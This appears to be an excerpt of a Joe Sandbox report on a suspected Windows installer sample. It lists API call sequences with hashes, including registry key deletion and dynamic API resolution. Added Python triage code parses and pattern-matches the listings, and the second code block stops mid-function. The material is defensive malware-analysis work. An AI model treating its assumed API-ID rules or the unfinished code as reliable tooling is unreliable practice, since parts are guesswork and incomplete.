                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeGlobal$lstrcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 176019282-0
                                                                                                                                                  • Opcode ID: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                                                  • Instruction ID: 5f977143e903dceeb219282147683d12af406f102b63ffa8563e92424d473d54
                                                                                                                                                  • Opcode Fuzzy Hash: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                                                  • Instruction Fuzzy Hash: B451B736F01119DAFF10DFA488815EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                                  • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                                  • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                                                                  • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                                  • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                                                                  APIs
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                                                                                                                  • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1148316912-0
                                                                                                                                                  • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                  • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                                  • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                  • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
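The two "APIs" listings above for the functions at 00402B9B (RegOpenKeyExW, RegEnumKeyW, RegDeleteKeyW) and 1000162F (WideCharToMultiByte, GlobalAlloc, GetProcAddress, GlobalFree) are the kind of call sequence an analyst scans for by hand when triaging a report like this one. The following is an added example and not part of the Joe Sandbox report or its tooling: a small Python parser for the listing format as it appears on this page (bullet, optional "Part of subcall function <addr>:" prefix, `Api.MODULE(args), ref: addr`, with the argument list absent on some lines) plus an ordered-subsequence matcher. The sample blocks are copied from the listings above; the pattern names (`dynamic_api_resolution`, `registry_key_deletion`) and the `PATTERNS` table are this example's own labels, not Joe Sandbox signatures.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox report and flag
call sequences worth a second look. Example code, not part of Joe Sandbox."""
import re
from typing import Dict, List, Set

# Sample input copied from the report listings above (the function at
# 1000162F and the one at 00402B9B), plus a block with folded-in callee calls.
RESOLVER_BLOCK = """\
APIs
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
• GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
• GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
• GlobalFree.KERNEL32(00000000), ref: 1000165A
"""

REGISTRY_BLOCK = """\
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
• RegCloseKey.ADVAPI32(?), ref: 00402BE0
• RegCloseKey.ADVAPI32(?), ref: 00402C05
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
"""

SUBCALL_BLOCK = """\
APIs
  • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
  • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
• GlobalFree.KERNEL32(?), ref: 10001928
"""

# One report line per API call. Calls folded in from a callee carry the
# "Part of subcall function <addr>:" prefix; calls whose arguments were not
# recorded have no parenthesised list (e.g. "wsprintfW.USER32 ref: ...").
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_apis(block: str) -> List[Dict]:
    """Return one record per API line, in listing order; headers are skipped."""
    calls = []
    for line in block.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # "APIs", "Strings" and any other non-call line
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "callee": int(m.group("callee"), 16) if m.group("callee") else None,
        })
    return calls


# Ordered subsequences (gaps allowed). Labels are this example's own.
PATTERNS = {
    # A name converted wide-to-ANSI and handed to GetProcAddress: the API is
    # resolved at run time instead of through the import table.
    "dynamic_api_resolution": ("WideCharToMultiByte", "GetProcAddress"),
    # Open a key, walk its subkeys, delete one: clean-up / self-removal logic.
    "registry_key_deletion": ("RegOpenKeyExW", "RegEnumKeyW", "RegDeleteKeyW"),
}


def is_subsequence(needle, hay) -> bool:
    """True if every element of needle occurs in hay, in order, with gaps."""
    it = iter(hay)
    return all(any(x == h for h in it) for x in needle)


def match_patterns(calls: List[Dict], include_subcalls: bool = True) -> Set[str]:
    """Names of PATTERNS whose sequence appears in the function's call order."""
    names = [c["api"] for c in calls if include_subcalls or c["callee"] is None]
    return {name for name, seq in PATTERNS.items() if is_subsequence(seq, names)}


if __name__ == "__main__":
    for label, block in (("1000162F", RESOLVER_BLOCK), ("00402B9B", REGISTRY_BLOCK)):
        calls = parse_apis(block)
        print(label, [c["api"] for c in calls], sorted(match_patterns(calls)))
```

A hit on `dynamic_api_resolution` is a triage hint, not a verdict: installers and plugin loaders resolve imports by name legitimately, so the value of this pass is in pointing the analyst at the `ref:` addresses (here 10001651) to read what string reaches GetProcAddress, not in the label itself. Folded-in callee lines are matched by default because the report attributes them to this function; pass `include_subcalls=False` to restrict matching to the function's own direct calls.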
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                  • Opcode ID: d593e7263c37e61c996d4e257660d94f001a2630b08086f07ab1fbfa1127a49e
                                                                                                                                                  • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                                                                  • Opcode Fuzzy Hash: d593e7263c37e61c996d4e257660d94f001a2630b08086f07ab1fbfa1127a49e
                                                                                                                                                  • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                                                                  • wsprintfW.USER32 ref: 00404A12
                                                                                                                                                  • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                                  • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                                                                  • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                                                                  • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                                                                  • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                  • String ID: !
                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                  • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                                  • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                                                                  • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                                  • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 0040593B
                                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 00405945
                                                                                                                                                  • lstrcatW.KERNEL32(?,00409014), ref: 00405957
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405935
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                  • API String ID: 2659869361-4083868402
                                                                                                                                                  • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                                                  • Instruction ID: 6247f5a3c9563be90945cd41d23768fa590745b080056b24a315d5606c671452
                                                                                                                                                  • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                                                  • Instruction Fuzzy Hash: E5D05E21101921AAC21277448C04DDF669CEE45300384002AF200B20A2CB7C1D518BFD
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                                                  • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                                                    • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1404258612-0
                                                                                                                                                  • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                                  • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                                                                  • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                                  • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                                                                  APIs
                                                                                                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,004037F6,75573420,00403621,?), ref: 00403839
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00403840
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403831
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                  • API String ID: 1100898210-4083868402
                                                                                                                                                  • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                                                  • Instruction ID: bf490ea997193b46d556285b385326fb3516ec302950e4cd11f154ac4515a356
                                                                                                                                                  • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                                                  • Instruction Fuzzy Hash: F9E0C23394102057C7216F15ED04B1ABBE86F89B22F018476F9407B7A283746C528BED
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\________.exe,C:\Users\user\Desktop\________.exe,80000000,00000003), ref: 00405987
                                                                                                                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\________.exe,C:\Users\user\Desktop\________.exe,80000000,00000003), ref: 00405997
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                                  • API String ID: 2709904686-1876063424
                                                                                                                                                  • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                                                  • Instruction ID: e5431d3d33a146c3150d202dfaa2e9e12a1dec100281116c20088c3141bfb115
                                                                                                                                                  • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                                                  • Instruction Fuzzy Hash: C6D05EA2414920DED3226704DC44AAFA3ACEF113107894466F901E61A5D7785C808AFD
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                                    • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$Free$Alloclstrcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 852173138-0
                                                                                                                                                  • Opcode ID: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                                                  • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                                                                                                                  • Opcode Fuzzy Hash: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                                                  • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
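The function records above list each routine's Windows API calls (with "Part of subcall function" lines for calls made one level down) and a Similarity "API ID" that Joe Sandbox uses to match routines across reports. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses records in the format shown on this page and recomputes the API ID from the call list, so a routine can be matched against another report offline. The normalisation rules it applies (drop the trailing A/W charset suffix, drop a leading Get or Ver, count the CamelCase words across all calls including subcalls, emit words most-frequent first with "$" between frequency tiers and ASCII order within a tier) are inferred only from the records on this page and are an assumption, not Joe Sandbox's documented algorithm; APIs outside this page may normalise differently. The embedded sample records are copied from this report and trimmed to the lines the parser reads.

```python
import re
from collections import Counter, namedtuple

# One call line, with or without an argument list, optionally prefixed "Part of subcall function <addr>: ".
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]{8}): )?"
    r"(?P<func>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
WORD_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z][a-z0-9]*")
DROPPED_VERBS = {"Get", "Ver"}  # assumption: inferred from the API IDs on this page only
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
ApiCall = namedtuple("ApiCall", "func module args ref parent")  # parent: subcall address or None

def parse_records(text):
    """One dict per 'APIs' block: its calls, its strings and the report's own API ID."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":
            current = {"calls": [], "strings": [], "api_id": None}
            records.append(current)
            section = "APIs"
        elif line in SECTIONS:
            section = line
        elif current is None:
            continue
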